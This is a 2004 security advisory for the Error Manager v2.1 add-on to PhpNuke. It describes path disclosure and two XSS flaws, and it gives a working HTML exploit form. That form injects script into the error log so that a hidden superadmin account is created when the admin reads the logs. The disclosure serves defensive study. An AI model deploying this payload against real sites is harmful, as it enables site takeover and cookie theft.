waraxe-2004-SA010.txt

`  
{===============================================================================  
=}  
{ [waraxe-2004-SA#010]   
}  
{===============================================================================  
=}  
{   
}  
{ [ Multiple vulnerabilities in Error Manager v2.1 for PhpNuke ]   
}  
{   
}  
{===============================================================================  
=}  
  
  
Author: Janek Vind "waraxe"  
Date: 18. March 2004  
Location: Estonia, Tartu  
  
  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
>From developer's readme file:  
  
This Error Manager is made by Gijza.net  
The idea came from DR3N.tk  
This addon is made for PHP-NUKE 6.0. but may work for other versions  
Admin CP is also included in this version.  
For the latest version go to www.gijza.net  
  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1. Full path disclosure   
  
  
Let's look at original code:  
  
//language  
if( isset( $newlang ) ) {  
include( "language/error/lang-$newlang.php" );  
$language = $newlang;  
} elseif ( isset( $lang ) ) {  
include( "language/error/lang-$lang.php" );  
$language = $lang;  
} else {  
include( "language/error/lang-$language.php" );  
}  
  
So - nothing will stop us to request this php file directly and this can lead to  
standard php error messages, revealing us the full path to error.php file:  
  
http://localhost/nuke71/error.php?newlang=foobar  
  
Warning: main(language/error/lang-foobar.php): failed to open stream: No such fi  
le or directory in D:\apache_wwwroot\nuke71\error.php on line 19  
  
  
  
2. Cross-Site Scripting aka XSS  
  
  
Again, let's look at original code:  
  
  
if ($error == 401) {  
$pagetitle = "- "._EM401."";  
}  
if ($error == 403) {  
$pagetitle = "- "._EM403."";  
}  
if ($error == 404) {  
$pagetitle = "- "._EM404."";  
}  
if ($error == 500) {  
$pagetitle = "- "._EM500."";  
}  
  
  
This is traditionally coded by using the "switch/case" language constructions, b  
ut  
for some reason the author uses there "if/if/if/..." construction, not even "if/  
elseif/elseif/else".  
And we can see, that if variable $error is not the 401, 403, 404 or 500, but som  
ething else, then  
we can UNINITIALIZED $pagetitle set to any value. This will lead of course to X  
SS conditions:  
  
http://localhost/nuke71/error.php?pagetitle=[xss code here]  
  
  
One more way to XSS exploiting:  
  
  
http://localhost/nuke71/error.php?error=>[xss code here]  
  
  
As with all the PhpNuke XSS cases, using of the POST parameters or even better -  
COOKIE parameters -   
will be preffered, because the GET parameters are strictly filtered in mainfile.  
php .  
  
  
  
3. Script injection to error log (nasty one!)  
  
  
This one is my favourite bug. I mean - Error Manager is suppose to log the error  
conditions in web server  
and therefore admin can find potential bugs on site and of course this logging f  
eature will reveale to  
admin many (unsuccessful) attacks by "bad guys". It's shame, but it's true - err  
or logging in Error Manager  
will log referer, request URI , etc, but WITHOUT ANY sanityze against html tags   
;)  
So we can inject any javascript code to error log and when admin will browse the  
logs, the website can be  
compromised - for example cookies can be stealed, additional superadmin accounts  
can be created without the  
knowledge of the admin (refference to [waraxe-2004-SA#008 - easy way to get supe  
radmin rights in PhpNuke 6.x-7.1.0]) etc ...  
  
So, there is an attack scenario:  
  
Write the html file like this one -   
  
  
<HTML>  
<HEAD><TITLE>Error Manager sploit</TITLE>  
</HEAD>  
<BODY bgcolor="#000000" text="#FFFFFF">  
<br><br><br>  
<center>  
  
<FORM action="http://www.victim.com/error.php" method="POST">  
  
<input type="hidden" name="error" value="<img width='0' height='0' border='0' sr  
c='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&ad  
d_pwd=coolpass&[email protected]&add_radminsuper=1'></img>404">  
<input type="submit" value="Attack">  
  
</FORM>  
  
</center>  
<br><br><br>  
  
</BODY>  
</HTML>  
  
  
Use it aginst victim server and then just wait, till admin reads the error log a  
nd then  
login to your brand new superadmin account ;)  
  
  
  
  
Greetings:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Greets to torufoorum staff and to all IT security related people in Estonia!  
Tervitused!  
Special greets to ulljobu!  
  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
[email protected]  
Janek Vind "waraxe"  
  
---------------------------------- [ EOF ] ------------------------------------  
`